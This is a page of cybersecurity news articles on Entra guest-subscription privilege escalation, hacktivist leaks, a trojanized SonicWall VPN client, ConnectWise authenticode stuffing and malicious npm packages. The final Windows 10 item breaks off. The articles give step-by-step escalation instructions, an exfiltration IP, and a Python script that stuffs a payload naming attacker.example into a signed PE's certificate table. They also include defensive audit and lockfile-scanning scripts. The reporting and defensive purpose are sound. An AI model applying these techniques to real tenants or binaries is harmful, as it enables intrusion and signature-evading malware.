Tag: Cyber Security

  • Beware the Hidden Risk in Your Entra Environment

    Guest Account Risk in Entra Environment

    If you invite guest users into your Entra ID tenant, you may be opening yourself up to a surprising risk.

    A gap in access control in Microsoft Entra’s subscription handling is allowing guest users to create and transfer subscriptions into the tenant they are invited into, while maintaining full ownership of them.

    All the guest user needs is permission to create subscriptions in their home tenant and an invitation into an external tenant as a guest. Once invited, the guest can create a subscription from their home tenant, direct it into the external tenant, and retain full ownership rights over it. This quiet privilege escalation gives a guest a privileged foothold in an environment where they should have only limited access.

    Many organizations treat guest accounts as low-risk based on their temporary, limited access, but this behavior, which works as designed, opens the door to known attack paths and lateral movement within the resource tenant. It can allow a threat actor to achieve unauthorized reconnaissance and persistence in the defender’s Entra ID, and advance privilege escalation in certain scenarios.

    Typical threat models and best practices don’t account for an unprivileged guest creating their own subscription within your tenant, so this risk may not only exist outside your organization’s controls; it may be off your security team’s radar as well.

    How to Compromise Your Entra ID Tenant with a Guest User Account

    Guest-made subscription footholds exploit the fact that Microsoft’s billing permissions (Enterprise Agreement or Microsoft Customer Agreement) are scoped at the billing account, not the Entra directory. Most security teams think about Azure permissions as either Entra Directory Roles (such as Global Administrator) or Azure RBAC Roles (such as Owner). But there is another set of permissions that get overlooked: Billing Roles.

    While Entra Directory and Azure RBAC Roles focus on managing permissions around identities and access to resources, Billing roles operate at the billing account level, which exists outside the well-understood Azure tenant authentication and authorization boundaries. A user with the right billing role can spin up or transfer subscriptions from their home tenant to gain control inside a target tenant, and a security team that is strictly auditing Entra Directory roles won’t gain visibility of these subscriptions in a standard Entra permission review.

    When a B2B guest user is invited to a resource tenant, they authenticate through their home tenant via federation rather than with credentials your tenant manages. The trade-off is that the resource tenant does not control how that authentication happens: Conditional Access in your tenant can still require MFA of guests, but unless your cross-tenant access settings trust the home tenant’s MFA claim the guest must register and satisfy it separately, and the strength of the underlying credential is outside your control. Defenders therefore usually limit the privileges and access of guests as the less securable class of identity. However, if the guest holds a billing role in their home tenant, they can use it to become a subscription Owner inside your Azure environment.

    This is also true for guest users who exist in pay-as-you-go Azure tenants that an attacker could spin up in just a few minutes. And, by default, any user, including guests, can invite external users into the directory. This means an attacker could leverage a compromised account to invite in a user with the correct billing permissions into your environment.

    How an Attacker can Gain Elevated Access Using an Unprivileged Entra Guest Account:

    1. Attacker gets control of a user with a billing role that can create subscriptions / owner of a subscription in a tenant, either by:
      1. Creating their own Entra tenant using an Azure free trial (the user they signed up with will be a Billing Account owner)
      2. Or, by compromising an existing user in a tenant who already has a privileged billing role / subscription ownership
    2. Attacker gets an invite to become a guest user in their target Entra tenant. By default, any user or guest can invite a guest into the tenant.
    3. Attacker logs into the Azure Portal, goes into their own home directory – which they completely control.
    4. Attacker navigates to Subscriptions > Add +.
    5. Attacker switches to the “Advanced” tab and sets the defender’s directory as the target directory.
    6. Attacker creates subscription. No subscription will appear in the attacker tenant. Instead, the subscription appears in the defender tenant, under the root management group.
    7. Attacker will automatically be assigned the RBAC Role of “Owner” for this subscription.

    Real-World Risk: What a Restless Guest Can Do with a New Subscription

    Once an attacker has a subscription with Owner permissions within another organization’s tenant, they can use that access to perform actions that would normally be blocked by their limited role. These include:

    Why Guest Subscription Creation Is a Growing Concern for Entra Security

    While more work is required to understand the true implications of this updated threat model, what we already know is concerning: any guest account federated into your tenant may represent a path to privilege. The risk is not hypothetical. Researchers at BeyondTrust have observed attackers actively abusing guest-based subscription creation in the wild. The threat is present, active, and the real danger here lies in the fact that it’s largely under the radar.

    These actions fall outside what most Azure administrators expect a guest user to be capable of. Most security teams don’t account for guest users being able to create and control subscriptions. As a result, this attack vector often falls outside of typical Entra threat models, making this path to privilege under-recognized, unexpected, and dangerously accessible.

    This attack vector is extremely common in B2B scenarios, where home and resource tenants are often controlled by different organizations. We suspect many organizations leveraging Entra ID B2B Guest features are unaware of the possible paths to privilege that this feature inadvertently enables.

    Mitigations: How to Prevent Guest Subscription Accounts from Gaining a Foothold

    To mitigate this behaviour, Microsoft allows organizations to configure Subscription Policies that block subscriptions from being transferred into (and out of) the tenant. With the policy blocking subscriptions entering the directory enabled, only explicitly exempted users can bring a subscription in; Microsoft has published supporting documentation[2] for this control.

    In addition to enabling this policy, we recommend the following actions:

    1. Audit all guest accounts in your environment and remove those that are no longer required
    2. Harden guest controls as much as possible: for instance, restrict who may invite guests and disable guest-to-guest invitations
    3. Review all subscriptions in your tenant regularly, including any that appear directly under the root management group, to detect unexpected guest-created subscriptions and resources
    4. Monitor Microsoft Defender for Cloud (formerly Security Center) alerts in the Azure Portal; relevant alerts may still fire even where your own visibility of a subscription is inconsistent
    5. Audit device access, especially where it is granted through dynamic group rules.
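
    The two checks a defender most wants after reading the attack steps and the mitigation list are a sweep for subscriptions whose Owner is a B2B guest and a read of the tenant-wide subscription policy. The script below is an added example, not BeyondTrust’s or Microsoft’s code. Its inputs mirror the fields you would pull with `az account list`, `az role assignment list --all`, Microsoft Graph `/users` and `GET /providers/Microsoft.Subscription/policies/default?api-version=2021-10-01`; the policy field names (`blockSubscriptionsIntoTenant`, `exemptedPrincipals`) are my reading of that REST resource, so confirm them against your tenant’s actual response. All sample data is constructed.

```python
"""Find Azure subscriptions whose Owner is an Entra B2B guest, and check the tenant's subscription policy.

Added example (not BeyondTrust's or Microsoft's code). Input shapes are trimmed to the fields used;
the policy field names are an assumption to verify against your tenant. Sample data is constructed.
"""
import re

EXT_UPN = re.compile(r"#EXT#@", re.IGNORECASE)   # UPN shape of a B2B guest: alias_home.tld#EXT#@resource.tld


def is_guest(principal: dict) -> bool:
    """Graph marks B2B guests with userType 'Guest'; the '#EXT#@' UPN marker is a second, independent signal."""
    return principal.get("userType") == "Guest" or bool(EXT_UPN.search(principal.get("userPrincipalName", "")))


def find_guest_owned_subscriptions(subscriptions, role_assignments, principals):
    """One finding per (subscription, guest) pair where the guest holds Owner directly at subscription scope.

    The scope is matched exactly: a subscription created or transferred by a guest carries a direct
    Owner assignment on itself, so Owners inherited from a management group or granted on a resource
    group are not reported. Group-based assignments are out of scope; expand membership first if needed.
    """
    by_id = {p["id"]: p for p in principals}
    findings = []
    for sub in subscriptions:
        scope = f"/subscriptions/{sub['subscriptionId']}".lower()
        for ra in role_assignments:
            if ra["scope"].lower() != scope or ra["roleDefinitionName"] != "Owner":
                continue
            principal = by_id.get(ra["principalId"])
            if principal is not None and is_guest(principal):
                findings.append({
                    "subscriptionId": sub["subscriptionId"],
                    "subscriptionName": sub["displayName"],
                    "guestUpn": principal["userPrincipalName"],
                })
    return findings


def incoming_transfers_blocked(policy: dict) -> bool:
    """True when the tenant-wide policy blocks subscriptions from entering the directory (field name assumed)."""
    return bool(policy.get("properties", {}).get("blockSubscriptionsIntoTenant"))


def exempted_principals(policy: dict) -> list:
    """Object IDs allowed to bypass the block; each deserves the same scrutiny as a Global Administrator."""
    return list(policy.get("properties", {}).get("exemptedPrincipals") or [])


# --- constructed sample data, not from any real tenant -----------------------------------------
SUBSCRIPTIONS = [
    {"subscriptionId": "11111111-1111-1111-1111-111111111111", "displayName": "prod-core"},
    {"subscriptionId": "22222222-2222-2222-2222-222222222222", "displayName": "Subscription 1"},  # guest-created
]
PRINCIPALS = [
    {"id": "aaaa-1", "userPrincipalName": "ops.admin@contoso.example", "userType": "Member"},
    {"id": "bbbb-2", "userPrincipalName": "mallory_attacker.example#EXT#@contoso.example", "userType": "Guest"},
    {"id": "cccc-3", "userPrincipalName": "auditor_partner.example#EXT#@contoso.example", "userType": "Guest"},
]
ROLE_ASSIGNMENTS = [
    {"scope": "/subscriptions/11111111-1111-1111-1111-111111111111", "roleDefinitionName": "Owner", "principalId": "aaaa-1"},
    {"scope": "/subscriptions/22222222-2222-2222-2222-222222222222", "roleDefinitionName": "Owner", "principalId": "bbbb-2"},
    {"scope": "/subscriptions/11111111-1111-1111-1111-111111111111", "roleDefinitionName": "Reader", "principalId": "cccc-3"},
    {"scope": "/subscriptions/11111111-1111-1111-1111-111111111111/resourceGroups/rg-shared",
     "roleDefinitionName": "Owner", "principalId": "cccc-3"},   # resource-group scope: not a subscription foothold
]
TENANT_POLICY = {"properties": {"blockSubscriptionsLeavingTenant": False,
                                "blockSubscriptionsIntoTenant": False, "exemptedPrincipals": []}}

if __name__ == "__main__":
    for f in find_guest_owned_subscriptions(SUBSCRIPTIONS, ROLE_ASSIGNMENTS, PRINCIPALS):
        print(f"guest {f['guestUpn']} owns subscription {f['subscriptionName']} ({f['subscriptionId']})")
    if not incoming_transfers_blocked(TENANT_POLICY):
        print("subscription policy does not block subscriptions entering this tenant")
```

    Run against real data, the guest-owned subscription is the one to escalate; an empty `exemptedPrincipals` list with the block enabled is the desired end state, and every exempted ID should map to a named, monitored administrator.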

    To assist defenders, BeyondTrust Identity Security Insights provides built-in detections to flag subscriptions created by guest accounts, offering automated visibility into these unusual behaviors.

    BeyondTrust Identity Security Insights customers can gain a holistic view of all Identities across their entire identity fabric. This includes gaining a consolidated understanding of Entra Guest accounts and their True Privilege™.

    The Bigger Picture: Identity Misconfigurations Are the New Exploits

    Guest-made subscription compromise isn’t an anomaly; it’s a stark example of the many overlooked identity security weaknesses that can undermine the modern enterprise environment, if not adequately addressed. Misconfigurations and weak default settings are prime access points for threat actors who are looking for the hidden paths into your environment.

    It isn’t just your admin accounts that need to be included in your security policies anymore. B2B trust models, inherited billing rights, and dynamic roles mean that every account is a potential launch point for privilege escalation. Re-examine your guest access policies, visibility tools, and subscription governance models now, before these Restless Guests take advantage.

    To gain a snapshot of potential identity-based risks in your environment, including those introduced through guest access, BeyondTrust offers a no-cost Identity Security Risk Assessment.

    Note: This article is expertly written and contributed by Simon Maxwell-Stewart, Senior Security Researcher at BeyondTrust. Simon Maxwell-Stewart is a University of Oxford physics graduate with over a decade of experience in the big data environment. Before joining BeyondTrust, he worked as a Lead Data Scientist in healthcare, and successfully brought multiple machine learning projects into production. Now working as a “resident graph nerd” on BeyondTrust’s security research team, Simon applies his expertise in graph analysis to help drive identity security innovation.

    1. Mnemonic. “Abusing dynamic groups in Azure AD for privilege escalation.” Available: https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/
    2. Microsoft. “Manage Azure subscription policies.” Available: https://learn.microsoft.com/en-us/azure/cost-management-billing/manage/manage-azure-subscription-policy
    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • Pro-Iranian Hacktivist Group Leaks Personal Records from the 2024 Saudi Games

    Pro-Iranian Hacktivist Group

    Thousands of personal records allegedly linked to athletes and visitors of the Saudi Games have been published online by a pro-Iranian hacktivist group called Cyber Fattah.

    Cybersecurity company Resecurity said the breach was announced on Telegram on June 22, 2025, in the form of SQL database dumps, characterizing it as an information operation “carried out by Iran and its proxies.”

    “The actors gained unauthorized access to phpMyAdmin (backend) and exfiltrated stored records,” Resecurity said. “This is an example of Iran using data breaches as part of a larger anti-U.S., anti-Israel, and anti-Saudi propaganda activity in cyberspace, targeting major sports and social events.”

    It’s believed that the data is likely pulled from the Saudi Games 2024 official website and then shared on DarkForums, a cybercrime forum that has gained attention in the wake of BreachForums’ repeated takedowns. The information was published by a forum user named ZeroDayX, a burner profile that was likely created to promote this breach.

    The leaked data includes IT staff credentials; government official email addresses; athletes’ and visitors’ information; passports and ID cards; bank statements; medical forms; and scanned copies of sensitive documents.

    “The activities of Cyber Fattah align with a broader trend of hacktivism in the Middle East, where groups frequently engage in cyber warfare as a form of activism,” Resecurity said.

    The leak unfolds against the backdrop of simmering tensions between Iran and Israel, with as many as 119 hacktivist groups claiming to have conducted cyber attacks, or having made declarations to align with or act against the two nations, per Cyberknow.

    Cyber Fattah, which calls itself an “Iranian cyber team,” has a history of targeting Israeli and Western web resources and government agencies.

    It’s also known to collaborate with other threat actors active in the region, such as 313 Team, which claimed responsibility for a distributed denial-of-service (DDoS) attack against social media platform Truth Social in retaliation for U.S. airstrikes on Iran’s nuclear facilities.

    “This incident by Cyber Fattah may indicate an interesting shift from Israel-centric malicious activity toward a broader focus on anti-U.S. and anti-Saudi messaging,” Resecurity said.

    Last week, a pro-Israel group known as Predatory Sparrow (aka Adalat Ali, Gonjeshke Darande, Indra, or MeteorExpress) claimed to have leaked data obtained from the Iranian Ministry of Communications. Notably, it also hacked Iran’s largest cryptocurrency exchange, Nobitex, and burned over $90 million in cryptocurrency by sending digital assets to invalid wallets.

    Cybersecurity company Outpost24 said the attackers possibly had “access to internal documentation that detailed the inner workings of the exchange and possibly even authentication credentials” to pull off the heist, or that it was a case of a rogue insider who worked with the group.

    “This was not a financially motivated heist but a strategic, ideological, and psychological operation,” security researcher Lidia López Sanz said. “By destroying rather than exfiltrating funds, the threat actor emphasized its goals: dismantling public trust in regime-linked institutions and signaling its technical superiority.”

    Subsequently, on June 18, Iran’s state broadcaster IRIB’s (short for Islamic Republic of Iran Broadcasting) television stream was hijacked to display pro-Israeli and anti-Iranian government imagery. IRIB claimed Israel was behind the incident.

    Image Source: Cyberknow

    Israel, for its part, has also become a target of pro-Palestine hacking groups like the Handala team, which has listed several Israeli organizations on its data leak site starting June 14, 2025. These included Delek Group, Y.G. New Idan, and AeroDreams.

    Another trend observed in the cyber warfare between Iran and Israel is the coming together of smaller hacktivist groups to form umbrella entities like the Cyber Islamic Resistance or United Cyber Front for Palestine and Iran.

    “These loosely affiliated ‘cyber unions’ share resources and synchronize campaigns, amplifying their impact despite limited technical sophistication,” Trustwave SpiderLabs said in a report published last week.

    The company also singled out another pro-Iranian group named DieNet that, despite its pro-Iranian and pro-Hamas stance, is believed to include Russian-speaking members and connections to other cyber communities in Eastern Europe.

    “What distinguishes DieNet from many other pro-Iranian actors is its hybrid identity,” it noted. “Linguistic analysis of DieNet’s messages, as well as timestamps, metadata, and interaction pattern, suggests that at least part of the group communicates internally in Russian or uses Slavic-language resources.”

    “This points to the broader phenomenon of cross-regional cyber collaboration, where ideological alignment overrides geographic or national boundaries.”

    Group-IB, in an analysis of Telegram-based hacktivist activity following June 13, said DieNet was the most referenced channel, quoted 79 times during the time period. In all, more than 5,800 messages have been recorded across various hacktivist channels between June 13 and 20.

    The deployment of cyber capabilities in the context of the Iran-Israel war, as well as other recent geopolitical events surrounding Hamas–Israel and Russia-Ukraine conflicts, demonstrates how digital operations are increasingly being integrated to supplement kinetic actions, influence public perception, and disrupt critical infrastructure, Trustwave added.


    Source: thehackernews.com…

  • SonicWall NetExtender Trojan and ConnectWise Exploits Used in Remote Access Attacks

    Jun 25, 2025 · Ravie Lakshmanan · VPN Security / Malware

    SonicWall NetExtender Trojan and ConnectWise Exploits

    Unknown threat actors have been distributing a trojanized version of SonicWall’s SSL VPN NetExtender application to steal credentials from unsuspecting users who may have installed it.

    “NetExtender enables remote users to securely connect and run applications on the company network,” SonicWall researcher Sravan Ganachari said. “Users can upload and download files, access network drives, and use other resources as if they were on the local network.”

    The malicious payload delivered via the rogue VPN software has been codenamed SilentRoute by Microsoft, which detected the campaign along with the network security company.

    SonicWall said the malware-laced NetExtender impersonates the latest version of the software (10.3.2.27) and has been found to be distributed via a fake website that has since been taken down. The installer is digitally signed by “CITYLIGHT MEDIA PRIVATE LIMITED.”

    This suggests that the campaign is targeting users searching for NetExtender on search engines like Google or Bing, and tricking them into installing it through spoofed sites propagated via known techniques like spear-phishing, search engine optimization (SEO) poisoning, malvertising, or social media posts.

    Two different components of the installer have been modified to facilitate the exfiltration of the configuration information to a remote server under the attacker’s control.

    These include “NeService.exe” and “NetExtender.exe,” which have been altered to skip validation of the digital certificates of various NetExtender components, continue execution regardless of the validation results, and exfiltrate the captured information to 132.196.198[.]163 over port 8080.

    “The threat actor added code in the installed binaries of the fake NetExtender so that information related to VPN configuration is stolen and sent to a remote server,” Ganachari said.

    “Once the VPN configuration details are entered and the “Connect” button is clicked, the malicious code performs its own validation before sending the data to the remote server. Stolen configuration information includes the username, password, domain, and more.”

    Threat Actors Abuse ConnectWise Authenticode Signatures

    The development comes as G DATA detailed a threat activity cluster dubbed EvilConwi that involves bad actors abusing ConnectWise to embed malicious code using a technique called authenticode stuffing without invalidating the digital signature.

    The German cybersecurity company said it has observed a spike in attacks using this technique since March 2025. The infection chains primarily leverage phishing emails as an initial access vector or through bogus sites advertised as artificial intelligence (AI) tools on Facebook.

    These email messages contain a OneDrive link that redirects recipients to a Canva page with a “View PDF” button, which results in the surreptitious download and execution of a ConnectWise installer.

    The attacks work by implanting malicious configurations in unauthenticated attributes within the Authenticode signature to serve a fake Windows update screen and prevent users from shutting down their systems, as well as including information about the external URL to which the remote connection should be established for persistent access.
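
    Why extra data inside the signature leaves the signature valid is worth seeing rather than taking on trust. The script below is an added example, not code from G DATA, ConnectWise or Microsoft. It assembles a minimal PE32 image in memory, computes the Authenticode digest the way signer and verifier do (the file in order, skipping `OptionalHeader.CheckSum`, the `IMAGE_DIRECTORY_ENTRY_SECURITY` entry and the certificate table itself), attaches a `WIN_CERTIFICATE`, then grows the blob inside that table and shows the digest is unchanged. The blob is a stand-in DER SEQUENCE, not a real PKCS#7 SignedData, and the image has no sections, so the specification’s section-ordering step reduces to hashing in file order; the payload string and vendor name are constructed.

```python
"""Bytes added inside a PE's certificate table leave the Authenticode digest unchanged.

Added example (not G DATA's, ConnectWise's or Microsoft's code). Stand-in signature blob, constructed data.
"""
import hashlib
import struct

FILE_ALIGN = 512


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def header_offsets(pe):
    """Return (file offset of the Security data-directory entry, file offset of OptionalHeader.CheckSum)."""
    e_lfanew = u32(pe, 0x3C)
    opt = e_lfanew + 4 + 20                         # past 'PE\0\0' and the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)    # data directories start (PE32 / PE32+)
    return dirs + 4 * 8, opt + 64                   # entry 4 is Security; CheckSum is at +64 in both formats


def authenticode_digest(pe, algo="sha256"):
    sec, checksum = header_offsets(pe)
    cert_off, cert_size = u32(pe, sec), u32(pe, sec + 4)
    h = hashlib.new(algo)
    h.update(pe[:checksum])                         # headers up to CheckSum
    h.update(pe[checksum + 4:sec])                  # skip CheckSum, continue to the Security entry
    if cert_off == 0:
        h.update(pe[sec + 8:])                      # unsigned image: everything else
    else:
        h.update(pe[sec + 8:cert_off])              # skip the Security entry, continue to the table
        h.update(pe[cert_off + cert_size:])         # the certificate table itself is never hashed
    return h.hexdigest()


def build_unsigned_pe(code: bytes) -> bytearray:
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)           # e_lfanew: PE header right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)   # i386, 0 sections, PE32 optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 60, FILE_ALIGN)     # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)             # NumberOfRvaAndSizes
    pe = dos + b"PE\0\0" + coff + opt
    pe += b"\0" * (FILE_ALIGN - len(pe)) + code
    pe += b"\0" * (-len(pe) % FILE_ALIGN)           # pad to file alignment
    return pe


def der_seq(content: bytes) -> bytes:
    """DER SEQUENCE with minimal length encoding."""
    n = len(content)
    body = n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")
    length = bytes([n]) if n < 0x80 else bytes([0x80 | len(body)]) + body
    return b"\x30" + length + content


def der_seq_content(buf: bytes) -> bytes:
    """Content octets of the outer SEQUENCE, ignoring any padding that follows it."""
    if buf[1] < 0x80:
        return buf[2:2 + buf[1]]
    k = buf[1] & 0x7F
    return buf[2 + k:2 + k + int.from_bytes(buf[2:2 + k], "big")]


def attach_certificate_table(pe: bytes, blob: bytes) -> bytearray:
    """Append one WIN_CERTIFICATE (wRevision 0x0200, type PKCS_SIGNED_DATA) and point the Security entry at it."""
    body = blob + b"\0" * (-len(blob) % 8)
    win_cert = struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body
    out = bytearray(pe) + win_cert
    sec, _ = header_offsets(out)
    struct.pack_into("<II", out, sec, len(pe), len(win_cert))
    return out


def sign(pe: bytes, signer: bytes) -> bytearray:
    """Stand-in signing: record the Authenticode digest in a DER SEQUENCE and attach it."""
    digest = bytes.fromhex(authenticode_digest(pe))
    return attach_certificate_table(pe, der_seq(b"digest=" + digest + b";signer=" + signer))


def stuff_certificate_table(signed: bytes, payload: bytes) -> bytearray:
    """Model of authenticode stuffing: re-encode the blob with extra bytes inside it and re-attach it."""
    sec, _ = header_offsets(signed)
    cert_off, cert_size = u32(signed, sec), u32(signed, sec + 4)
    old_blob = signed[cert_off + 8:cert_off + cert_size]
    return attach_certificate_table(signed[:cert_off], der_seq(der_seq_content(old_blob) + payload))


def demo():
    unsigned = build_unsigned_pe(b"\xC3" * 16)     # sixteen RET bytes stand in for code
    signed = sign(unsigned, b"Some Vendor Ltd")      # constructed signer name
    stuffed = stuff_certificate_table(signed, b'{"fake_update_screen":true,"relay":"attacker.example"}')
    return {
        "digest_unsigned": authenticode_digest(unsigned),
        "digest_signed": authenticode_digest(signed),
        "digest_stuffed": authenticode_digest(stuffed),
        "file_sha256_changed": hashlib.sha256(signed).hexdigest() != hashlib.sha256(stuffed).hexdigest(),
        "table_grew_by": len(stuffed) - len(signed),
    }
```

    `demo()` returns three identical Authenticode digests alongside a changed whole-file SHA-256, which is exactly the gap the campaign relies on: a verifier that reports “signature valid” is answering a question about the hashed region, not about the certificate table. A defender who needs to catch this has to inspect the PKCS#7 structure itself (the unauthenticated attributes in this case) or compare the certificate table size and whole-file hash against a known-good copy of the same release.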

    What makes EvilConwi notable is that it offers malicious actors a cover for nefarious operations by conducting them using a trusted, legitimate, and maybe elevated system or software process, thereby allowing them to fly under the radar.

    “By modifying these settings, threat actors create their own remote access malware that pretends to be a different software like an AI-to-image converter by Google Chrome,” security researcher Karsten Hahn said. “They commonly add fake Windows update images and messages too, so that the user does not turn off the system while threat actors remotely connect to them.”


    Source: thehackernews.com…

  • North Korea-linked Supply Chain Attack Targets Developers with 35 Malicious npm Packages

    Jun 25, 2025 · Ravie Lakshmanan · Malware / Open Source

    NPM Supply Chain Attack

    Cybersecurity researchers have uncovered a fresh batch of malicious npm packages linked to the ongoing Contagious Interview operation originating from North Korea.

    According to Socket, the ongoing supply chain attack involves 35 malicious packages that were uploaded from 24 npm accounts. These packages have been collectively downloaded over 4,000 times. The complete list of the JavaScript libraries is below –

    • react-plaid-sdk
    • sumsub-node-websdk
    • vite-plugin-next-refresh
    • vite-plugin-purify
    • nextjs-insight
    • vite-plugin-svgn
    • node-loggers
    • react-logs
    • reactbootstraps
    • framer-motion-ext
    • serverlog-dispatch
    • mongo-errorlog
    • next-log-patcher
    • vite-plugin-tools
    • pixel-percent
    • test-topdev-logger-v1
    • test-topdev-logger-v3
    • server-log-engine
    • logbin-nodejs
    • vite-loader-svg
    • struct-logger
    • flexible-loggers
    • beautiful-plugins
    • chalk-config
    • jsonpacks
    • jsonspecific
    • jsonsecs
    • util-buffers
    • blur-plugins
    • proc-watch
    • node-orm-mongoose
    • prior-config
    • use-videos
    • lucide-node, and
    • router-parse

    Of these, six continue to remain available for download from npm: react-plaid-sdk, sumsub-node-websdk, vite-plugin-next-refresh, vite-loader-svg, node-orm-mongoose, and router-parse.

    Each of the identified npm packages contains a hex-encoded loader dubbed HexEval, which is designed to collect host information post installation and selectively deliver a follow-on payload that’s responsible for delivering a known JavaScript stealer called BeaverTail.

    BeaverTail, in turn, is configured to download and execute a Python backdoor called InvisibleFerret, enabling the threat actors to collect sensitive data and establish remote control of infected hosts.

    “This nesting-doll structure helps the campaign evade basic static scanners and manual reviews,” Socket researcher Kirill Boychenko said. “One npm alias also shipped a cross-platform keylogger package that captures every keystroke, showing the threat actors’ readiness to tailor payloads for deeper surveillance when the target warrants it.”
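
    Because the loader is hex-encoded and the stealer is fetched later, the reliable indicators a defender has from this report are the package names themselves and the fact that the loader runs at install time. The script below is an added example, not Socket’s or npm’s code: it walks a lockfile (v2/v3 flat `packages` map keyed by `node_modules` path, with `hasInstallScript` set when a package declares preinstall/install/postinstall hooks; v1 nested `dependencies` tree), flags the 35 names listed above, and lists every package with install-time hooks for review. The sample lockfile and manifest, including version numbers, are constructed.

```python
"""Scan an npm lockfile and package.json for the packages named above and for install-time hooks.

Added example (not Socket's or npm's code). Sample lockfile and manifest are constructed.
"""

CONTAGIOUS_INTERVIEW_PACKAGES = frozenset("""
react-plaid-sdk sumsub-node-websdk vite-plugin-next-refresh vite-plugin-purify nextjs-insight
vite-plugin-svgn node-loggers react-logs reactbootstraps framer-motion-ext serverlog-dispatch
mongo-errorlog next-log-patcher vite-plugin-tools pixel-percent test-topdev-logger-v1
test-topdev-logger-v3 server-log-engine logbin-nodejs vite-loader-svg struct-logger
flexible-loggers beautiful-plugins chalk-config jsonpacks jsonspecific jsonsecs util-buffers
blur-plugins proc-watch node-orm-mongoose prior-config use-videos lucide-node router-parse
""".split())


def package_name(path: str):
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b'. The root project ('') has no name here."""
    marker = "node_modules/"
    idx = path.rfind(marker)
    return None if idx < 0 else path[idx + len(marker):]


def flatten_v1(deps: dict, prefix: str = "", out: dict = None) -> dict:
    """Turn a lockfileVersion 1 nested 'dependencies' tree into the v2/v3 path-keyed shape."""
    out = {} if out is None else out
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        out[path] = meta
        flatten_v1(meta.get("dependencies", {}), path + "/", out)
    return out


def scan_lockfile(lock: dict) -> dict:
    """Known-malicious names (any nesting depth) plus every package that runs code at install time."""
    packages = lock.get("packages")
    if packages is None:                       # lockfileVersion 1
        packages = flatten_v1(lock.get("dependencies", {}))
    known, hooks = [], []
    for path, meta in packages.items():
        name = package_name(path)
        if name is None:
            continue
        if name in CONTAGIOUS_INTERVIEW_PACKAGES:
            known.append({"name": name, "version": meta.get("version"), "path": path})
        if meta.get("hasInstallScript"):       # v2/v3 only; v1 lockfiles do not record this
            hooks.append({"name": name, "version": meta.get("version")})
    return {"known_malicious": known, "install_scripts": hooks}


def scan_manifest(pkg: dict) -> list:
    """Direct dependencies matching the list, across all dependency fields."""
    fields = ("dependencies", "devDependencies", "optionalDependencies", "peerDependencies")
    return sorted(n for f in fields for n in pkg.get(f, {}) if n in CONTAGIOUS_INTERVIEW_PACKAGES)


# constructed sample: a "coding assignment" repo with one direct and one transitive hit (versions made up)
SAMPLE_LOCK = {
    "name": "interview-assignment", "lockfileVersion": 3, "requires": True,
    "packages": {
        "": {"name": "interview-assignment", "dependencies": {"react": "^18.3.1", "vite-plugin-purify": "^1.0.2"}},
        "node_modules/react": {"version": "18.3.1"},
        "node_modules/vite-plugin-purify": {"version": "1.0.2", "hasInstallScript": True},
        "node_modules/@types/node": {"version": "20.14.2"},
        "node_modules/some-ui-kit/node_modules/router-parse": {"version": "0.1.4"},
        "node_modules/node-gyp-build": {"version": "4.8.1", "hasInstallScript": True},  # legitimate, still review
    },
}
SAMPLE_MANIFEST = {"dependencies": {"react": "^18.3.1", "vite-plugin-purify": "^1.0.2"},
                   "devDependencies": {"vite": "^5.2.0"}}

if __name__ == "__main__":
    result = scan_lockfile(SAMPLE_LOCK)
    for hit in result["known_malicious"]:
        print(f"KNOWN MALICIOUS: {hit['name']}@{hit['version']} at {hit['path']}")
    for hook in result["install_scripts"]:
        print(f"runs install script: {hook['name']}@{hook['version']}")
    print("direct manifest hits:", scan_manifest(SAMPLE_MANIFEST))
```

    Run this before `npm install`, never after: the loader executes during installation, which is why the recruiters insist the project be run outside a container. `npm install --ignore-scripts` is the complementary control for anything you must install to inspect.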

    Contagious Interview, first publicly documented by Palo Alto Networks Unit 42 in late 2023, is an ongoing campaign undertaken by North Korean state-sponsored threat actors to obtain unauthorized access to developer systems with the goal of conducting cryptocurrency and data theft.

    The cluster is also broadly tracked under the monikers CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi.

    Recent iterations of the campaign have also been observed taking advantage of the ClickFix social engineering tactic to deliver malware such as GolangGhost and PylangGhost. This sub-cluster of activity has been designated the name ClickFake Interview.

    The latest findings from Socket point to a multi-pronged approach where Pyongyang threat actors are embracing various methods to trick prospective targets into installing malware under the pretext of an interview or a Zoom meeting.

    The npm offshoot of Contagious Interview typically involves the attackers posing as recruiters on LinkedIn, sending job seekers and developers coding assignments by sharing a link to a malicious project hosted on GitHub or Bitbucket that embeds the npm packages within it.

    “They target software engineers who are actively job-hunting, exploiting the trust that job-seekers typically place in recruiters,” Boychenko said. “Fake personas initiate contact, often with scripted outreach messages and convincing job descriptions.”

    The victims are then coaxed into cloning and running these projects outside containerized environments during the purported interview process.

    “This malicious campaign highlights an evolving tradecraft in North Korean supply chain attacks, one that blends malware staging, OSINT-driven targeting, and social engineering to compromise developers through trusted ecosystems,” Socket said.

    “By embedding malware loaders like HexEval in open source packages and delivering them through fake job assignments, threat actors sidestep perimeter defenses and gain execution on the systems of targeted developers. The campaign’s multi-stage structure, minimal on-registry footprint, and attempt to evade containerized environments point to a well-resourced adversary refining its intrusion methods in real-time.”


    Source: thehackernews.com…

  • Microsoft Extends Windows 10 Security Updates for One Year with New Enrollment Options

    Jun 25, 2025 · Ravie Lakshmanan · Endpoint Security / IT Management

    Microsoft on Tuesday announced that it’s extending Windows 10 Extended Security Updates (ESU) for an extra year by letting users either pay a small fee of $30 or sync their PC settings to the cloud.

    The development comes ahead of the tech giant’s upcoming October 14, 2025, deadline, when it plans to officially end support and stop providing security updates for devices running Windows 10. The desktop operating system was launched in July 2015.

